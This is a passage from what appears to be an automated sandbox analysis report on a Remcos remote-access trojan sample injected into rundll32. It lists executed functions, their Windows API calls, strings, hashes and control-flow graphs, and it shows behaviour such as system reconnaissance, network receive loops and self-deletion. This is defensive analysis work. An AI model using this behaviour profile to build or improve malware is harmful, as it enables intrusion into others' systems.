2b41c94 48168->48169 48170 2b41ccb _Atexit 48169->48170 48172 2b405dd 20 API calls _Atexit 48169->48172 48170->48042 48172->48170 48174 2b05214 48173->48174 48175 2b023ce 11 API calls 48174->48175 48176 2b0521f 48175->48176 48180 2b05234 48176->48180 48178 2b0522e 48178->48075 48179->48082 48181 2b05240 48180->48181 48182 2b0526e 48180->48182 48196 2b028e8 28 API calls 48181->48196 48197 2b028a4 22 API calls 48182->48197 48186 2b0524a 48186->48178 48196->48186 48199 2b04ba0 WaitForSingleObject 48198->48199 48200 2b04bcd recv 48198->48200 48205 2b21076 53 API calls 48199->48205 48202 2b04be0 48200->48202 48202->48097 48203 2b04bbc SetEvent 48203->48202 48204->48097 48205->48203 48206->48111 48207->48116 48208->48118 48211 2b01f8e 48210->48211 48212 2b02252 11 API calls 48211->48212 48213 2b01f99 48212->48213 48213->47458 48213->47459 48213->47461 48214->47464 48215->47491 48216->47490 48217->47479 48218->47485 48219->47489 48220->47522 48225 2b0f7c2 48223->48225 48224 2b13549 3 API calls 48224->48225 48225->48224 48227 2b0f866 48225->48227 48229 2b0f856 Sleep 48225->48229 48246 2b0f7f4 48225->48246 48226 2b0905c 28 API calls 48226->48246 48228 2b0905c 28 API calls 48227->48228 48231 2b0f871 48228->48231 48229->48225 48230 2b1bc5e 28 API calls 48230->48246 48233 2b1bc5e 28 API calls 48231->48233 48234 2b0f87d 48233->48234 48258 2b13814 14 API calls 48234->48258 48237 2b01f09 11 API calls 48237->48246 48238 2b0f890 48239 2b01f09 11 API calls 48238->48239 48241 2b0f89c 48239->48241 48240 2b02093 28 API calls 48240->48246 48242 2b02093 28 API calls 48241->48242 48243 2b0f8ad 48242->48243 48245 2b1376f 14 API calls 48243->48245 48244 2b1376f 14 API calls 48244->48246 48247 2b0f8c0 48245->48247 48246->48226 48246->48229 48246->48230 48246->48237 48246->48240 48246->48244 48256 2b0d096 111 API calls ___scrt_fastfail 48246->48256 48257 2b13814 14 API calls 48246->48257 48259 2b12850 TerminateProcess WaitForSingleObject 48247->48259 48249 2b0f8c8 ExitProcess 48260 2b127ee 61 API calls 48255->48260 48257->48246 48258->48238 48259->48249 48261 2b347c9 48262 2b347d1 pre_c_initialization 48261->48262 48279 2b442c2 48262->48279 48264 2b347dc pre_c_initialization 48284 2b345cf 48264->48284 48266 2b34865 48295 2b349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 48266->48295 48267 2b347f1 __RTC_Initialize 48267->48266 48289 2b34770 48267->48289 48269 2b3486c ___scrt_initialize_default_local_stdio_options 48271 2b3480a pre_c_initialization 48271->48266 48272 2b3481b 48271->48272 48292 2b34f0d InitializeSListHead 48272->48292 48274 2b34820 pre_c_initialization 48293 2b34f19 24 API calls 2 library calls 48274->48293 48276 2b34843 pre_c_initialization 48294 2b44832 35 API calls 2 library calls 48276->48294 48278 2b3484e pre_c_initialization 48280 2b442f4 48279->48280 48281 2b442d1 48279->48281 48280->48264 48281->48280 48296 2b405dd 20 API calls _Atexit 48281->48296 48283 2b442e4 _Atexit 48283->48264 48285 2b345dd 48284->48285 48288 2b345e2 ___scrt_initialize_onexit_tables 48284->48288 48285->48288 48297 2b349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 48285->48297 48287 2b34665 48288->48267 48298 2b34735 48289->48298 48292->48274 48293->48276 48294->48278 48295->48269 48296->48283 48297->48287 48299 2b34752 48298->48299 48300 2b34759 48298->48300 48304 2b43f3a 23 API calls __onexit 48299->48304 48305 2b43faa 23 API calls __onexit 48300->48305 48303 2b34757 48303->48271 48304->48303 48305->48303 48306 2b3be58 48308 2b3be64 _swprintf CallCatchBlock 48306->48308 48307 2b3be72 48322 2b405dd 20 API calls _Atexit 48307->48322 48308->48307 48310 2b3be9c 48308->48310 48317 2b45888 EnterCriticalSection 48310->48317 48312 2b3be77 _Atexit CallCatchBlock 48313 2b3bea7 48318 2b3bf48 48313->48318 48317->48313 48320 2b3bf56 48318->48320 48319 2b3beb2 48323 2b3becf LeaveCriticalSection std::_Lockit::~_Lockit 48319->48323 48320->48319 48324 2b4976c 36 API calls 2 library calls 48320->48324 48322->48312 48323->48312 48324->48320 48325 2b0165e 48326 2b01666 48325->48326 48328 2b01669 48325->48328 48327 2b016a8 48329 2b344ea new 22 API calls 48327->48329 48328->48327 48330 2b01696 48328->48330 48331 2b0169c 48329->48331 48332 2b344ea new 22 API calls 48330->48332 48332->48331

                                      Executed Functions

                                      Function 02B1CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,02B0E9E1), ref: 02B1CB65
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CB6E
                                      • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,02B0E9E1), ref: 02B1CB85
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CB88
                                      • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,02B0E9E1), ref: 02B1CB9A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CB9D
                                      • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,02B0E9E1), ref: 02B1CBAE
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CBB1
                                      • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,02B0E9E1), ref: 02B1CBC3
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CBC6
                                      • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,02B0E9E1), ref: 02B1CBD2
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CBD5
                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,02B0E9E1), ref: 02B1CBE6
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CBE9
                                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,02B0E9E1), ref: 02B1CBFA
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CBFD
                                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,02B0E9E1), ref: 02B1CC0E
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC11
                                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,02B0E9E1), ref: 02B1CC22
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC25
                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,02B0E9E1), ref: 02B1CC36
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC39
                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,02B0E9E1), ref: 02B1CC4A
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC4D
                                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,02B0E9E1), ref: 02B1CC5E
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC61
                                      • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,02B0E9E1), ref: 02B1CC72
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC75
                                      • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,02B0E9E1), ref: 02B1CC83
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC86
                                      • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,02B0E9E1), ref: 02B1CC97
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CC9A
                                      • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,02B0E9E1), ref: 02B1CCA7
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CCAA
                                      • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,02B0E9E1), ref: 02B1CCB7
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CCBA
                                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,02B0E9E1), ref: 02B1CCCC
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CCCF
                                      • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,02B0E9E1), ref: 02B1CCDC
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CCDF
                                      • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,02B0E9E1), ref: 02B1CCF0
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CCF3
                                      • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,02B0E9E1), ref: 02B1CD04
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CD07
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,02B0E9E1), ref: 02B1CD19
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CD1C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,02B0E9E1), ref: 02B1CD29
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CD2C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,02B0E9E1), ref: 02B1CD39
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CD3C
                                      • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,02B0E9E1), ref: 02B1CD49
                                      • GetProcAddress.KERNEL32(00000000), ref: 02B1CD4C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$HandleModule
                                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                      • API String ID: 4236061018-3687161714
                                      • Opcode ID: b43e3b4cba1efcf83dd40b4954e1745a455a4f8d8b49eb28495e00f1237151ce
                                      • Instruction ID: e626c9a5a34770c4d165a3bf73bee143d084880fdb60242644cf34102ae83b3f
                                      • Opcode Fuzzy Hash: b43e3b4cba1efcf83dd40b4954e1745a455a4f8d8b49eb28495e00f1237151ce
                                      • Instruction Fuzzy Hash: 7C41FAA4EC03587AFA107BB66C4DE2B3F7DDB456D53014C97B195A3230DABC98148EA4
                                      Function 02B0F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 02B13549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 02B13569
                                        • Part of subcall function 02B13549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,02B752F0), ref: 02B13587
                                        • Part of subcall function 02B13549: RegCloseKey.KERNEL32(?), ref: 02B13592
                                      • Sleep.KERNEL32(00000BB8), ref: 02B0F85B
                                      • ExitProcess.KERNEL32 ref: 02B0F8CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                      • String ID: 4.9.4 Pro$override$pth_unenc
                                      • API String ID: 2281282204-930821335
                                      • Opcode ID: 289be5c9b4f5b8ec454be7c142b670502861dd30d3506dc80703788358806133
                                      • Instruction ID: dc38a23eb0337d1ef920d89bdc2be65088f8cb5caf88fb30d300b848574dc2db
                                      • Opcode Fuzzy Hash: 289be5c9b4f5b8ec454be7c142b670502861dd30d3506dc80703788358806133
                                      • Instruction Fuzzy Hash: E321F461F1030097E61A767D489AA7E7EAB9B81B10F9000D8F40A5B6C5FE65D9058FE3
                                      Function 02B04F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1212 2b04f51-2b04f5f 1213 2b04f65-2b04f6c 1212->1213 1214 2b04fea 1212->1214 1216 2b04f74-2b04f7b 1213->1216 1217 2b04f6e-2b04f72 1213->1217 1215 2b04fec-2b04ff1 1214->1215 1218 2b04fc0-2b04fe8 CreateEventA CreateThread 1216->1218 1219 2b04f7d-2b04fbb GetLocalTime call 2b1bb8e call 2b052fd call 2b02093 call 2b1b4ef call 2b01fd8 1216->1219 1217->1218 1218->1215 1219->1218
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 02B04F81
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02B04FCD
                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 02B04FE0
                                      Strings
                                      • KeepAlive | Enabled | Timeout: , xrefs: 02B04F94
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$EventLocalThreadTime
                                      • String ID: KeepAlive | Enabled | Timeout:
                                      • API String ID: 2532271599-1507639952
                                      • Opcode ID: 807f064ea172dbf66e624c86c33f20c42d71ade6a7ae57c28619c918d43993e8
                                      • Instruction ID: 779018fa04a5d92c5514fe1717d46daa91f007ea1cded72526d180e9283d8abd
                                      • Opcode Fuzzy Hash: 807f064ea172dbf66e624c86c33f20c42d71ade6a7ae57c28619c918d43993e8
                                      • Instruction Fuzzy Hash: A2110631800384ABD732A776884DFAB7FBCDBC6750F04049EE98647580DA745045CBB2
                                      Function 02B04B96 Relevance: 4.5, APIs: 3, Instructions: 28synchronizationnetworkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,02B74EF8,02B04C49,00000000,?,?,?,02B74EF8,?), ref: 02B04BA5
                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02B0548B), ref: 02B04BC3
                                      • recv.WS2_32(?,?,?,00000000), ref: 02B04BDA
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EventObjectSingleWaitrecv
                                      • String ID:
                                      • API String ID: 311754179-0
                                      • Opcode ID: 99f957d98df5fcc156b8ea7abceee64a44bc8e139634c1f34e14dba91458dc5e
                                      • Instruction ID: c3d0128bdfdf1ae56140f1ac9ed6bb27ab8c1ecbeb7cbaf18178c67c530df02f
                                      • Opcode Fuzzy Hash: 99f957d98df5fcc156b8ea7abceee64a44bc8e139634c1f34e14dba91458dc5e
                                      • Instruction Fuzzy Hash: 46F0823A108622FFD7169B14EC49F4AFB62FB84760F108619F555522A08772AC20CBA1
                                      Function 02B1B60D Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetComputerNameExW.KERNEL32(00000001,?,0000002B,02B750E4), ref: 02B1B62A
                                      • GetUserNameW.ADVAPI32(?,02B0F223), ref: 02B1B642
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Name$ComputerUser
                                      • String ID:
                                      • API String ID: 4229901323-0
                                      • Opcode ID: 50176b7a8db07631e2c05e51f8eb2bebf7f21dc9aec60e23d86d224d8b737ade
                                      • Instruction ID: cccbe479f4ca571eecb29ae50c05337de3d115f58aea2924b7f937575ecb6f53
                                      • Opcode Fuzzy Hash: 50176b7a8db07631e2c05e51f8eb2bebf7f21dc9aec60e23d86d224d8b737ade
                                      • Instruction Fuzzy Hash: 0901FF7290011CABDB06EBD4DC88EDDBBBDEF44315F1001A6A505A71A0EEB46E89CB94
                                      Function 02B0F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,02B154FC,02B74EE0,02B75A00,02B74EE0,00000000,02B74EE0,00000000,02B74EE0,4.9.4 Pro), ref: 02B0F8E5
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID:
                                      • API String ID: 2299586839-0
                                      • Opcode ID: 41723189f78d94339c5e69ce65a2087f45c92072f4d70eb8f5b2d5ed7289f86a
                                      • Instruction ID: 0cbf4291eaf032abcbaafe51dfab14d8f067b1f8fb01832662b23707b9c7075a
                                      • Opcode Fuzzy Hash: 41723189f78d94339c5e69ce65a2087f45c92072f4d70eb8f5b2d5ed7289f86a
                                      • Instruction Fuzzy Hash: ECD05B30B4421C77D61096959C0AFAA7B9CD701751F0005D6BE05D72C0E9E15E048BD1
                                      Function 02B0E9C5 Relevance: 49.8, APIs: 15, Strings: 13, Instructions: 795COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 5 2b0e9c5-2b0ea47 call 2b1cb50 GetModuleFileNameW call 2b0f3c3 call 2b020f6 * 2 call 2b1be1b call 2b0fb17 call 2b01e8d call 2b3fd00 22 2b0ea93-2b0eb5b call 2b01e65 call 2b01fab call 2b01e65 call 2b0531e call 2b06383 call 2b01fe2 call 2b01fd8 * 2 call 2b01e65 call 2b01fc0 call 2b05aa6 call 2b01e65 call 2b051e3 call 2b01e65 call 2b051e3 5->22 23 2b0ea49-2b0ea8e call 2b0fbb3 call 2b01e65 call 2b01fab call 2b10f37 call 2b0fb64 call 2b0f3b0 5->23 69 2b0eb5d-2b0eba8 call 2b06c1e call 2b01fe2 call 2b01fd8 call 2b01fab call 2b13549 22->69 70 2b0ebae-2b0ebc9 call 2b01e65 call 2b0b9bd 22->70 49 2b0eef2-2b0ef03 call 2b01fd8 23->49 69->70 101 2b0f34f-2b0f36a call 2b01fab call 2b139a9 call 2b12475 69->101 80 2b0ec03-2b0ec0a call 2b0d069 70->80 81 2b0ebcb-2b0ebea call 2b01fab call 2b13549 70->81 89 2b0ec13-2b0ec1a 80->89 90 2b0ec0c-2b0ec0e 80->90 81->80 97 2b0ebec-2b0ec02 call 2b01fab call 2b139a9 81->97 94 2b0ec1c 89->94 95 2b0ec1e-2b0ec2a call 2b1b2c3 89->95 93 2b0eef1 90->93 93->49 94->95 105 2b0ec33-2b0ec37 95->105 106 2b0ec2c-2b0ec2e 95->106 97->80 126 2b0f36f-2b0f3a0 call 2b1bc5e call 2b01f04 call 2b13a23 call 2b01f09 * 2 101->126 108 2b0ec76-2b0ec89 call 2b01e65 call 2b01fab 105->108 109 2b0ec39 call 2b07716 105->109 106->105 127 2b0ec90-2b0ed18 call 2b01e65 call 2b1bc5e call 2b01f13 call 2b01f09 call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab 108->127 128 2b0ec8b call 2b07755 108->128 117 2b0ec3e-2b0ec40 109->117 120 2b0ec42-2b0ec47 call 2b07738 call 2b07260 117->120 121 2b0ec4c-2b0ec5f call 2b01e65 call 2b01fab 117->121 120->121 121->108 142 2b0ec61-2b0ec67 121->142 157 2b0f3a5-2b0f3af call 2b0dd42 call 2b14f2a 126->157 177 2b0ed80-2b0ed84 127->177 178 2b0ed1a-2b0ed33 call 2b01e65 call 2b01fab call 2b3bad6 127->178 128->127 142->108 143 2b0ec69-2b0ec6f 142->143 143->108 146 2b0ec71 call 2b07260 143->146 146->108 180 2b0ef06-2b0ef66 call 2b36e90 call 2b0247c call 2b01fab * 2 call 2b136f8 call 2b09057 177->180 181 2b0ed8a-2b0ed91 177->181 178->177 205 2b0ed35-2b0ed7b call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab call 2b0da34 call 2b01f13 call 2b01f09 178->205 236 2b0ef6b-2b0efbf call 2b01e65 call 2b01fab call 2b02093 call 2b01fab call 2b1376f call 2b01e65 call 2b01fab call 2b3baac 180->236 183 2b0ed93-2b0ee0d call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab call 2b0cdf9 181->183 184 2b0ee0f-2b0ee19 call 2b09057 181->184 191 2b0ee1e-2b0ee42 call 2b0247c call 2b34798 183->191 184->191 212 2b0ee51 191->212 213 2b0ee44-2b0ee4f call 2b36e90 191->213 205->177 218 2b0ee53-2b0ee9e call 2b01f04 call 2b3f809 call 2b0247c call 2b01fab call 2b0247c call 2b01fab call 2b13947 212->218 213->218 273 2b0eea3-2b0eec8 call 2b347a1 call 2b01e65 call 2b0b9bd 218->273 287 2b0efc1 236->287 288 2b0efdc-2b0efde 236->288 273->236 286 2b0eece-2b0eeed call 2b01e65 call 2b1bc5e call 2b0f474 273->286 286->236 306 2b0eeef 286->306 292 2b0efc3-2b0efda call 2b1cd9b CreateThread 287->292 289 2b0efe0-2b0efe2 288->289 290 2b0efe4 288->290 289->292 293 2b0efea-2b0f0c6 call 2b02093 * 2 call 2b1b4ef call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab call 2b3baac call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab StrToIntA call 2b09de4 call 2b01e65 call 2b01fab 290->293 292->293 344 2b0f101 293->344 345 2b0f0c8-2b0f0ff call 2b344ea call 2b01e65 call 2b01fab CreateThread 293->345 306->93 346 2b0f103-2b0f11b call 2b01e65 call 2b01fab 344->346 345->346 357 2b0f159-2b0f16c call 2b01e65 call 2b01fab 346->357 358 2b0f11d-2b0f154 call 2b344ea call 2b01e65 call 2b01fab CreateThread 346->358 368 2b0f1cc-2b0f1df call 2b01e65 call 2b01fab 357->368 369 2b0f16e-2b0f1c7 call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab call 2b0d9e8 call 2b01f13 call 2b01f09 CreateThread 357->369 358->357 379 2b0f1e1-2b0f215 call 2b01e65 call 2b01fab call 2b01e65 call 2b01fab call 2b3baac call 2b0c162 368->379 380 2b0f21a-2b0f23e call 2b1b60d call 2b01f13 call 2b01f09 368->380 369->368 379->380 402 2b0f240-2b0f241 SetProcessDEPPolicy 380->402 403 2b0f243-2b0f256 CreateThread 380->403 402->403 404 2b0f264-2b0f26b 403->404 405 2b0f258-2b0f262 CreateThread 403->405 408 2b0f279-2b0f280 404->408 409 2b0f26d-2b0f277 CreateThread 404->409 405->404 412 2b0f282-2b0f285 408->412 413 2b0f28e 408->413 409->408 415 2b0f287-2b0f28c 412->415 416 2b0f2cc-2b0f2df call 2b01fab call 2b134ff 412->416 418 2b0f293-2b0f2c7 call 2b02093 call 2b052fd call 2b02093 call 2b1b4ef call 2b01fd8 413->418 415->418 425 2b0f2e4-2b0f2e7 416->425 418->416 425->157 427 2b0f2ed-2b0f32d call 2b1bc5e call 2b01f04 call 2b1361b call 2b01f09 call 2b01f04 425->427 443 2b0f346-2b0f34b DeleteFileW 427->443 444 2b0f34d 443->444 445 2b0f32f-2b0f332 443->445 444->126 445->126 446 2b0f334-2b0f341 Sleep call 2b01f04 445->446 446->443
                                      APIs
                                        • Part of subcall function 02B1CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,02B0E9E1), ref: 02B1CB65
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CB6E
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,02B0E9E1), ref: 02B1CB85
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CB88
                                        • Part of subcall function 02B1CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,02B0E9E1), ref: 02B1CB9A
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CB9D
                                        • Part of subcall function 02B1CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,02B0E9E1), ref: 02B1CBAE
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CBB1
                                        • Part of subcall function 02B1CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,02B0E9E1), ref: 02B1CBC3
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CBC6
                                        • Part of subcall function 02B1CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,02B0E9E1), ref: 02B1CBD2
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CBD5
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,02B0E9E1), ref: 02B1CBE6
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CBE9
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,02B0E9E1), ref: 02B1CBFA
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CBFD
                                        • Part of subcall function 02B1CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,02B0E9E1), ref: 02B1CC0E
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CC11
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,02B0E9E1), ref: 02B1CC22
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CC25
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,02B0E9E1), ref: 02B1CC36
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CC39
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,02B0E9E1), ref: 02B1CC4A
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CC4D
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,02B0E9E1), ref: 02B1CC5E
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CC61
                                        • Part of subcall function 02B1CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,02B0E9E1), ref: 02B1CC72
                                        • Part of subcall function 02B1CB50: GetProcAddress.KERNEL32(00000000), ref: 02B1CC75
                                        • Part of subcall function 02B1CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,02B0E9E1), ref: 02B1CC83
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104), ref: 02B0E9EE
                                        • Part of subcall function 02B10F37: __EH_prolog.LIBCMT ref: 02B10F3C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                      • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\rundll32.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt
                                      • API String ID: 2830904901-485870807
                                      • Opcode ID: cbc21988a16f2a90c83429a1e458b5e0c3bb7890280cbe0cb4b0a060ba579c6b
                                      • Instruction ID: 7e42dd5af147c6c5aef102e0351db791fd58873faa395ff13e167e980f3431d6
